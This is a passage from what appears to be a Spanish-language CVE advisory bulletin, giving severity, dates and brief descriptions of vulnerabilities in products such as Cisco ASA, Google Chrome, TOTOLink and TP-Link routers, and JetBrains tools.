    Severidad: ALTA
    Fecha de publicación: 19/04/2020
    Fecha de última actualización: 07/08/2023
    En el plugin media-library-assistant versiones anteriores a 2.82 para WordPress, una Ejecución de Código Remota puede ocurrir por medio de los parámetros tax_query, meta_query, o date_query en la función mla_gallery por medio de un administrador.
  • Vulnerabilidad en el procesamiento de paquetes DNS sobre IPv6 para el Cisco Adaptive Security Appliance (ASA) Software y el Firepower Threat Defense (FTD) Software (CVE-2020-3191)
    Severidad: MEDIA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el procesamiento de paquetes DNS sobre IPv6 para el Cisco Adaptive Security Appliance (ASA) Software y el Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar que el dispositivo se sobrecargue inesperadamente, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad es debido a una comprobación inapropiada de la longitud de un campo en un paquete DNS IPv6. Un atacante podría explotar esta vulnerabilidad mediante el envío de una consulta DNS sobre IPv6 diseñada, que atraviesa el dispositivo afectado. Una explotación podría permitir al atacante causar que el dispositivo se sobrecargue, resultando en una condición DoS. Esta vulnerabilidad es específica solo de DNS sobre el tráfico IPv6.
  • Vulnerabilidad en la implementación de Open Shortest Path First (OSPF) en el Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3195)
    Severidad: MEDIA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación de Open Shortest Path First (OSPF) en el Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una pérdida de memoria sobre un dispositivo afectado. La vulnerabilidad es debido al procesamiento incorrecto de determinados paquetes OSPF. Un atacante podría explotar esta vulnerabilidad mediante el envío de una serie de paquetes OSPF diseñados para que sean procesados por un dispositivo afectado. Una explotación con éxito podría permitir a un atacante consumir continuamente la memoria sobre un dispositivo afectado y eventualmente causar que se sobrecargue, resultando en una condición de denegación de servicio (DoS).
  • CVE-2021-31814
    Severidad: BAJA
    Fecha de publicación: 10/02/2022
    Fecha de última actualización: 08/08/2023
    En Stormshield versiones 1.1.0, y versiones 2.1.0 hasta 2.9.0, un atacante puede bloquear el acceso de un cliente a la VPN y puede obtener información confidencial mediante el cliente SN VPN SSL
  • CVE-2021-44850
    Severidad: MEDIA
    Fecha de publicación: 10/02/2022
    Fecha de última actualización: 08/08/2023
    En los dispositivos Xilinx Zynq-7000 SoC, la modificación física de una imagen de arranque de la SD permite un ataque de desbordamiento del búfer en la ROM. Dado que el encabezado de la imagen de arranque del Zynq-7000 no está cifrada ni autenticada antes de su uso, un atacante puede modificar el encabezado de arranque almacenado en una tarjeta SD para que una imagen segura parezca no estar cifrada, y podrá modificar toda la gama de valores de inicialización de registros. Normalmente, estos registros estarán restringidos cuando el arranque sea seguro. De importancia para este ataque son dos registros que controlan el tipo y el tamaño de transferencia de la tarjeta SD. Estos registros podrían modificarse de forma que causen un desbordamiento del búfer en la ROM
  • CVE-2022-21174
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en un componente de terceros de Intel(R) Quartus(R) Prime Pro Edition versiones anteriores a 21.3, puede permitir a un usuario autenticado habilitar potencialmente una escalada de privilegios por medio del acceso local
  • CVE-2022-21157
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en la aplicación Intel(R) Smart Campus Android versiones anteriores a 6.1, puede permitir a un usuario autenticado habilitar potencialmente una divulgación de información por medio de acceso local
  • CVE-2022-21153
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en la aplicación Intel(R) Capital Global Summit para Android puede permitir a un usuario autenticado habilitar potencialmente una divulgación de información por medio de acceso local
  • CVE-2022-20680
    Severidad: MEDIA
    Fecha de publicación: 10/02/2022
    Fecha de última actualización: 24/07/2023
    Una vulnerabilidad en la interfaz de administración basada en web de Cisco Prime Service Catalog podría permitir a un atacante remoto autenticado acceder a información confidencial en un dispositivo afectado. Esta vulnerabilidad es debido a una aplicación inapropiada de los niveles de privilegio de administrador para los datos confidenciales de bajo valor. Un atacante con acceso de administrador de sólo lectura a la interfaz de administración basada en web podría explotar esta vulnerabilidad mediante el envío de una petición HTTP maliciosa a la página que contiene los datos confidenciales. Una explotación con éxito podría permitir al atacante recopilar información confidencial sobre los usuarios del sistema y los pedidos que han sido realizados usando la aplicación
  • CVE-2021-39676
    Severidad: ALTA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    En la función writeThrowable del archivo AndroidFuture.java, se presenta un posible desajuste de serialización/deserialización de paquetes debido a una comprobación de entrada inapropiada. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11, ID de Android: A-197228210
  • CVE-2021-45385
    Severidad: MEDIA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 17/08/2023
    Se presenta una vulnerabilidad de desreferencia de puntero Null en ffjpeg versión d5cfd49 (06-12-2021) en la función bmp_load(). Cuando la información del tamaño en los metadatos del bmp está fuera de rango, devuelve sin asignar memoria intermedia a "pb-)pdata" y no sale del programa. Así que el programa es bloqueado cuando intenta acceder a pb-)data, en jfif_encode() en jfif.c:763. Esto es debido al parche incompleto para CVE-2020-13438
  • CVE-2021-39688
    Severidad: BAJA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    En TBD de TBD, se presenta una posible lectura fuera de límites debido a TBD. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-206039140, Referencias: N/A
  • CVE-2021-4098
    Severidad: MEDIA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de datos en Mojo en Google Chrome versiones anteriores a 96.0.4664.110, permitía a un atacante remoto que hubiera comprometido el proceso de renderización llevar a cabo potencialmente un escape de sandbox por medio de una página HTML diseñada
  • CVE-2021-4100
    Severidad: MEDIA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    Un problema del Ciclo de Vida de los Objetos en ANGLE en Google Chrome versiones anteriores a 96.0.4664.110, permitía a un atacante remoto explotar potencialmente una corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-23853
    Severidad: MEDIA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    El plugin LSP (Language Server Protocol) en KDE Kate versiones anteriores a 21.12.2 y KTextEditor versiones anteriores a 5.91.0 intenta ejecutar el binario del servidor LSP asociado cuando es abierto un archivo de un tipo determinado. Si este binario está ausente del PATH, intentará ejecutar el binario del servidor LSP en el directorio del archivo que acaba de abrir (debido a un malentendido de la API de QProcess, que nunca fue pretendido). Este puede ser un directorio no confiable
  • CVE-2021-38003
    Severidad: MEDIA
    Fecha de publicación: 23/11/2021
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de V8 en Google Chrome versiones anteriores a 95.0.4638.69, permitía a un atacante remoto explotar potencialmente la corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-23992
    Severidad: ALTA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 08/08/2023
    XCOM Data Transport para Windows, Linux y UNIX versiones 11.6, contienen una vulnerabilidad debido a una comprobación insuficiente de entradas que podría permitir a atacantes remotos ejecutar comandos arbitrarios con altos privilegios
  • CVE-2022-0301
    Severidad: MEDIA
    Fecha de publicación: 12/02/2022
    Fecha de última actualización: 08/08/2023
    Un desbordamiento del búfer de la pila en DevTools en Google Chrome versiones anteriores a 97.0.4692.99, permitía a un atacante que convenciera a un usuario de instalar una extensión maliciosa explotar potencialmente una corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-23389
    Severidad: ALTA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que PublicCMS versión v4.0 contiene una vulnerabilidad de ejecución de código remota (RCE) por medio del parámetro cmdarray
  • CVE-2022-0214
    Severidad: MEDIA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 02/08/2023
    El plugin Popup | Custom Popup Builder de WordPress versiones anteriores a 1.3.1, autocarga los datos de su popup en todas las páginas, ya que dichos datos pueden ser enviados por usuarios no autenticados, y no es comprobada su longitud, esto podría causar una denegación de servicio en el blog
  • CVE-2021-46362
    Severidad: ALTA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Inyección de Plantilla del Lado del Servidor (SSTI) en los formularios Registration and Forgotten Password de Magnolia versiones v6.2.3 y anteriores, permite a atacantes ejecutar código arbitrario por medio de una carga útil diseñada introducida en el parámetro fullname
  • CVE-2022-24110
    Severidad: MEDIA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 08/08/2023
    Kiteworks MFT versión 7.5, puede permitir que un usuario no autorizado restablezca las contraseñas de otros usuarios. Esto ha sido corregido en versiones 7.6 y posteriores
  • CVE-2022-0305
    Severidad: MEDIA
    Fecha de publicación: 12/02/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada en Service Worker API en Google Chrome versiones anteriores a 97.0.4692.99, permitía a un atacante remoto que hubiera comprometido el proceso de renderización omitir el aislamiento del sitio por medio de una página HTML diseñada
  • CVE-2022-24988
    Severidad: ALTA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 08/08/2023
    En galois_2p8 versiones anteriores a 0.1.2, la función PrimitivePolynomialField::new presenta un desbordamiento de búfer "off-by-one" para un vector
  • CVE-2022-23317
    Severidad: MEDIA
    Fecha de publicación: 15/02/2022
    Fecha de última actualización: 08/08/2023
    El receptor HTTP(S) de CobaltStrike versiones anteriores a 4.5 incluyéndola, no determina si la URL de la petición comienza con "/", y los atacantes pueden obtener información relevante al especificar la URL
  • CVE-2021-45421
    Severidad: MEDIA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 08/08/2023
    ** NO SOPORTADO CUANDO SE ASIGNÓ ** Los productos Emerson Dixell XWEB-500 están afectados por una divulgación de información por medio del listado de directorios. Un atacante potencial puede usar esta configuración errónea para acceder a todos los archivos de los directorios remotos. Nota: el producto no ha sido soportado desde 2018 y debe ser eliminado o reemplazado
  • CVE-2021-42714
    Severidad: ALTA
    Fecha de publicación: 15/02/2022
    Fecha de última actualización: 08/08/2023
    Splashtop Remote Client (Business Edition) versiones hasta 3.4.8.3, crea un archivo temporal en un directorio con permisos no seguros
  • CVE-2021-42713
    Severidad: ALTA
    Fecha de publicación: 15/02/2022
    Fecha de última actualización: 08/08/2023
    Splashtop Remote Client (Personal Edition) versiones hasta 3.4.6.1, crea un archivo temporal en un directorio con permisos no seguros
  • CVE-2022-23319
    Severidad: MEDIA
    Fecha de publicación: 17/02/2022
    Fecha de última actualización: 08/08/2023
    Un fallo de segmentación durante el análisis de archivos PCF en pcf2bdf versiones posteriores a 1.05 incluyéndola, permite a un atacante desencadenar un bloqueo del programa por medio de un archivo de fuentes PCF especialmente diseñado. Este fallo afecta la disponibilidad del software y de los componentes dependientes
  • CVE-2022-24985
    Severidad: MEDIA
    Fecha de publicación: 16/02/2022
    Fecha de última actualización: 08/08/2023
    Los formularios generados por JQueryForm.com versiones anteriores a 05-02-2022, permiten a un atacante remoto autenticado omitir la autenticación y acceder a la sección administrativa de otros formularios alojados en el mismo servidor web. Esto es relevante sólo cuando una organización aloja más de uno de estos formularios en su servidor
  • CVE-2022-25318
    Severidad: MEDIA
    Fecha de publicación: 18/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Cerebrate versiones hasta 1.4. Una ACL incorrecta de grupos compartidos permitía a un usuario no privilegiado editar y modificar los grupos compartidos
  • CVE-2022-22899
    Severidad: BAJA
    Fecha de publicación: 17/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Core FTP / SFTP Server versión v2 Build 725, permite a atacantes no autenticados causar una denegación de servicio (DoS) por medio de un paquete diseñado mediante el servicio SSH
  • CVE-2022-24953
    Severidad: MEDIA
    Fecha de publicación: 17/02/2022
    Fecha de última actualización: 08/08/2023
    La extensión Crypt_GPG versiones anteriores a 1.6.7 para PHP, no evita las opciones adicionales en las llamadas GPG, lo que presenta un riesgo para determinados entornos y versiones de GPG
  • CVE-2021-45382
    Severidad: ALTA
    Fecha de publicación: 17/02/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Ejecución de Comandos Remota (RCE) en todas las revisiones H/W de la serie de routers D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L y DIR-836L por medio de la función DDNS en el archivo binario ncc2. Nota: Los DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, todas las revisiones de hardware, han llegado al final de su vida útil ("EOL") / fin de la vida útil ("EOS") y, por lo tanto, este problema no será parcheado
  • CVE-2022-22922
    Severidad: ALTA
    Fecha de publicación: 18/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el extensor de rango Wi-Fi TP-Link TL-WA850RE versiones anteriores a v6_200923, usaba claves de sesión altamente predecibles y fácilmente detectables, lo que permitía a atacantes alcanzar privilegios administrativos
  • CVE-2022-24300
    Severidad: ALTA
    Fecha de publicación: 02/02/2022
    Fecha de última actualización: 08/08/2023
    Minetest versiones anteriores a 5.4.0, permite a atacantes añadir o modificar meta campos arbitrarios de la misma pila de ítems como entrada de usuario guardada, también se conoce como inyección de meta pila de ítems
  • CVE-2021-38009
    Severidad: MEDIA
    Fecha de publicación: 23/12/2021
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada en la caché en Google Chrome versiones anteriores a 96.0.4664.45, permitía a un atacante remoto filtrar datos de origen cruzado por medio de una página HTML diseñada
  • CVE-2022-25335
    Severidad: MEDIA
    Fecha de publicación: 18/02/2022
    Fecha de última actualización: 08/08/2023
    RigoBlock Dragos versiones hasta 17-02-2022, carece del modificador onlyOwner para setMultipleAllowances. Esto permite una manipulación de tokens, como es explotado "in the wild" en febrero de 2022. NOTA: aunque el 17-02-2022 es la fecha de anuncio de la vulnerabilidad por parte del proveedor, la vulnerabilidad no será solucionada hasta que sea producida una actualización importante del protocolo
  • CVE-2022-22308
    Severidad: MEDIA
    Fecha de publicación: 21/02/2022
    Fecha de última actualización: 08/08/2023
    IBM Planning Analytics versión 2.0, es vulnerable a un ataque de Inclusión de archivos remota (RFI). La entrada del usuario podría pasar a los comandos de inclusión de archivos y la aplicación web podría ser engañada para incluir archivos remotos con código malicioso. IBM X-Force ID: 216891
  • CVE-2022-24295
    Severidad: MEDIA
    Fecha de publicación: 21/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Okta Advanced Server Access Client para Windows versiones anteriores a 1.57.0, es vulnerable a una inyección de comandos por medio de una URL especialmente diseñada
  • CVE-2022-21142
    Severidad: MEDIA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de autenticación en a-blog cms versiones Ver.2.8.x anteriores a Ver.2.8.74, versiones Ver.2.9.x anteriores a Ver.2.9.39, versiones Ver.2.10.x anteriores a Ver.2.10.43 y versiones Ver.2.11.x anteriores a Ver.2.11.41, permite a un atacante remoto no autenticado omitir la autenticación bajo una condición específica
  • CVE-2022-25075
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A3000RU versión V5.9c.2280_B20180512, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25402
    Severidad: MEDIA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso incorrecto en HMS versión v1.0, permite a atacantes no autenticados leer y modificar todos los archivos PHP
  • CVE-2022-25076
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A800R versión V4.1.2cu.5137_B20200730, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25077
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A3100R versión V4.1.2cu.5050_B20200504, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25078
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A3600R versión V4.1.2cu.5182_B20201102, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25079
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A810R versión V4.1.2cu.5182_B20201026, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25080
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A830R versión V5.9c.4729_B20191112, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25336
    Severidad: MEDIA
    Fecha de publicación: 18/02/2022
    Fecha de última actualización: 08/08/2023
    Ibexa DXP ezsystems/ezpublish-kernel versiones 7.5.x anteriores a 7.5.26 y versiones 1.3.x anteriores a 1.3.12, permite ataques de Referencia Directa a Objetos Insegura (IDOR) contra archivos de imagen porque la ruta de la imagen y el nombre del archivo pueden ser deducidos correctamente
  • CVE-2022-25082
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A950RG versiones V5.9c.4050_B20190424 y V4.1.2cu.5204_B20210112, contienen una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25083
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A860R versión V4.1.2cu.5182_B20201027, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25084
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink T6 versión V5.9c.4085_B20190428 contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-25081
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink T10 versión V5.9c.5061_B20200511, contiene una vulnerabilidad de inyección de comandos en la función "Main". Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro QUERY_STRING
  • CVE-2022-24336
    Severidad: MEDIA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    En JetBrains TeamCity versiones anteriores a 2021.2.1, un atacante no autenticado puede cancelar construcciones en ejecución por medio de una petición XML-RPC al servidor de TeamCity.
  • CVE-2022-24442
    Severidad: ALTA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    JetBrains YouTrack versiones anteriores a 2021.4.40426, era vulnerable a un ataque de tipo SSTI (Server-Side Template Injection) por medio de plantillas FreeMarker.
  • CVE-2022-25643
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    seatd-launch en seatd versiones 0.6.x anteriores a 0.6.4, permite eliminar archivos con privilegios escalados cuando es instalado setuid root. El vector de ataque es un nombre de ruta de socket suministrado por el usuario
  • CVE-2022-25363
    Severidad: MEDIA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos WatchGuard Firebox y XTM permiten a un atacante remoto autenticado con credenciales no privilegiadas modificar las credenciales privilegiadas de los usuarios de administración. Esta vulnerabilidad afecta a Fireware OS versiones anteriores a 12.7.2_U2, versiones 12.x anteriores a 12.1.3_U8 y versiones 12.2.x hasta 12.5.x anteriores a 12.5.9_U2
  • CVE-2022-25355
    Severidad: MEDIA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    EC-CUBE versiones 3.0.0 a 3.0.18-p3 y EC-CUBE versiones 4.0.0 a 4.1.1, manejan inapropiadamente los valores del encabezado HTTP Host, lo que puede conllevar a que un atacante remoto no autenticado dirija la versión vulnerable de EC-CUBE para enviar un correo electrónico con alguna URL de reemisión de contraseña falsificada a usuarios de EC-CUBE
  • CVE-2022-25640
    Severidad: MEDIA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    En wolfSSL versiones anteriores a 5.2.0, un servidor TLS versión 1.3 no puede aplicar correctamente el requisito de autenticación mutua. Un cliente puede simplemente omitir el mensaje certificate_verify del handshake, y nunca presentar un certificado
  • CVE-2022-24331
    Severidad: ALTA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    En JetBrains TeamCity versiones anteriores a 2021.1.4, era posible una suplantación de la autenticación de GitLab.
  • CVE-2022-22716
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Microsoft Excel
  • CVE-2022-25366
    Severidad: MEDIA
    Fecha de publicación: 19/02/2022
    Fecha de última actualización: 08/08/2023
    Cryptomator versiones hasta 1.6.5, permite una inyección de DYLIB porque, aunque presenta el flag 0x1000 para Hardened Runtime, presenta los derechos com.apple.security.cs.disable-library-validation y com.apple.security.cs.allow-dyld-environment-variables. Un atacante puede explotar esto creando un archivo .dylib malicioso que puede ser ejecutado por medio de la variable de entorno DYLD_INSERT_LIBRARIES
  • CVE-2022-26159
    Severidad: MEDIA
    Fecha de publicación: 28/02/2022
    Fecha de última actualización: 08/08/2023
    El plugin de autocompletado en Ametys CMS versiones anteriores a 4.5.0, permite a un atacante remoto no autenticado leer documentos como plugins/web/service/search/auto-completion/(domain)/en.xml (y nombres de ruta similares para otros idiomas), que contienen todos los caracteres escritos por todos los usuarios, incluyendo el contenido de las páginas privadas. Por ejemplo, una página privada puede contener nombres de usuario, direcciones de correo electrónico y posiblemente contraseñas.
  • CVE-2021-22437
    Severidad: MEDIA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    Se presenta un desbordamiento de enteros de software que conlleva a una condición TOCTOU en los smartphones. Una explotación con éxito de esta vulnerabilidad puede causar el acceso a direcciones aleatorias.
  • CVE-2022-25262
    Severidad: ALTA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    En JetBrains Hub versiones anteriores a 2022.1.14434, era posible la toma de posesión de peticiones SAML.
  • CVE-2022-25359
    Severidad: MEDIA
    Fecha de publicación: 26/02/2022
    Fecha de última actualización: 08/08/2023
    En los dispositivos ICL ScadaFlex II SCADA Controller SC-1 y SC-2 versión 1.03.07, los atacantes remotos no autenticados pueden sobrescribir, eliminar o crear archivos.
  • CVE-2022-26157
    Severidad: MEDIA
    Fecha de publicación: 28/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en la aplicación web de Cherwell Service Management (CSM) versión 10.2.3. La cookie ASP.NET_Sessionid no está protegida por el flag de seguridad. Esto la hace propensa a ser interceptada por un atacante si el tráfico es enviado por canales no cifrados.
  • CVE-2022-24986
    Severidad: MEDIA
    Fecha de publicación: 26/02/2022
    Fecha de última actualización: 08/08/2023
    KDE KCron versiones hasta 21.12.2, usa un archivo temporal en /tmp cuando se guarda, pero reutiliza el nombre del archivo durante una sesión de edición. Por lo tanto, alguien que vea cómo se crea la primera vez podría potencialmente interceptar el archivo la siguiente vez, permitiendo a esa persona ejecutar comandos no autorizados.
  • CVE-2022-24446
    Severidad: BAJA
    Fecha de publicación: 01/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Zoho ManageEngine Key Manager Plus versión 6.1.6. Un usuario, con el nivel de Operador, puede visualizar todos los servidores SSH (y la información de los usuarios) incluso si ningún servidor SSH o usuario está asociado al operador.
  • CVE-2022-25064
    Severidad: ALTA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TP-LINK TL-WR840N(ES)_V6.20_180709 contiene una vulnerabilidad de ejecución de código remota (RCE) por medio de la función oal_wan6_setIpAddr.
  • CVE-2022-22321
    Severidad: BAJA
    Fecha de publicación: 01/03/2022
    Fecha de última actualización: 08/08/2023
    Los usuarios de mensajería local de IBM MQ Appliance versiones 9.2 CD y 9.2 LTS, son almacenados con un hash de contraseña que proporciona una protección insuficiente. IBM X-Force ID: 218368.
  • CVE-2022-25061
    Severidad: ALTA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TP-LINK TL-WR840N(ES)_V6.20_180709 contiene una vulnerabilidad de inyección de comandos por medio del componente oal_setIp6DefaultRoute.
  • CVE-2022-25060
    Severidad: ALTA
    Fecha de publicación: 25/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el TP-LINK TL-WR840N(ES)_V6.20_180709, contenía una vulnerabilidad de inyección de comandos por medio del componente oal_startPing.
  • CVE-2022-22300
    Severidad: MEDIA
    Fecha de publicación: 01/03/2022
    Fecha de última actualización: 08/08/2023
    Un manejo inapropiado de permisos o privilegios insuficientes en Fortinet FortiAnalyzer versiones 5.6.0 hasta 5.6.11, FortiAnalyzer versiones 6.0.0 hasta 6.0.11, FortiAnalyzer versiones 6.2.0 hasta 6.2.9, FortiAnalyzer versiones 6.4.0 hasta 6.4.7, FortiAnalyzer versiones 7.0.0 hasta 7 .0. 2, FortiManager versiones 5.6.0 hasta 5.6.11, FortiManager versiones 6.0.0 hasta 6.0.11, FortiManager versiones 6.2.0 hasta 6.2.9, FortiManager versiones 6.4.0 hasta 6.4.7, FortiManager versiones 7.0.0 hasta 7.0.2, permite a un atacante omitir la política del dispositivo y forzar la acción de cambio de contraseña para su usuario.
  • CVE-2022-25809
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Una Neutralización Inapropiada de la salida de audio de los dispositivos Amazon Echo Dot de 3ª y 4ª generación permite una ejecución de comandos de voz arbitrarios en estos dispositivos por medio de una habilidad maliciosa (en el caso de atacantes remotos) o mediante el emparejamiento de un dispositivo Bluetooth malicioso (en el caso de atacantes físicamente próximos), también conocido como ataque "Alexa versus Alexa (AvA)"
  • CVE-2022-25010
    Severidad: MEDIA
    Fecha de publicación: 01/03/2022
    Fecha de última actualización: 08/08/2023
    El componente /rootfs en RageFile de Stepmania versión v5.1b2 y anteriores, permite a atacantes acceder a todo el sistema de archivos
  • CVE-2022-24305
    Severidad: ALTA
    Fecha de publicación: 02/03/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine SharePoint Manager Plus versiones anteriores a 4329, es vulnerable a un filtrado de datos confidenciales que conllevan a una escalada de privilegios
  • CVE-2022-24447
    Severidad: MEDIA
    Fecha de publicación: 02/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Zoho ManageEngine Key Manager Plus versiones anteriores a 6200. Un servicio expuesto por la aplicación permite a un usuario, con el nivel de Operador, acceder a certificados SSL almacenados y a los pares de claves asociados durante la exportación
  • Vulnerabilidad en las peticiones HTTP en la interfaz de servicios web de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3452)
    Severidad: MEDIA
    Fecha de publicación: 22/07/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado conducir ataques de salto de directorio y leer archivos confidenciales en un sistema objetivo. La vulnerabilidad es debido a una falta de comprobación de entrada apropiada de las URL en las peticiones HTTP procesadas por un dispositivo afectado. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición HTTP diseñada que contenga secuencias de caracteres salto de directorio en un dispositivo afectado. Una explotación con éxito podría permitir a un atacante visualizar archivos arbitrarios dentro del sistema de archivos de servicios web en el dispositivo objetivo. El sistema de archivos de los servicios web es habilitado cuando el dispositivo afectado es configurado con las funcionalidades WebVPN o AnyConnect. Esta vulnerabilidad no puede ser utilizada para obtener acceso a los archivos del sistema ASA o FTD o los archivos del sistema operativo (SO) subyacente
  • CVE-2022-21967
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Xbox Live Auth Manager para Windows
  • CVE-2022-23266
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Microsoft Defender for IoT
  • CVE-2022-24469
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
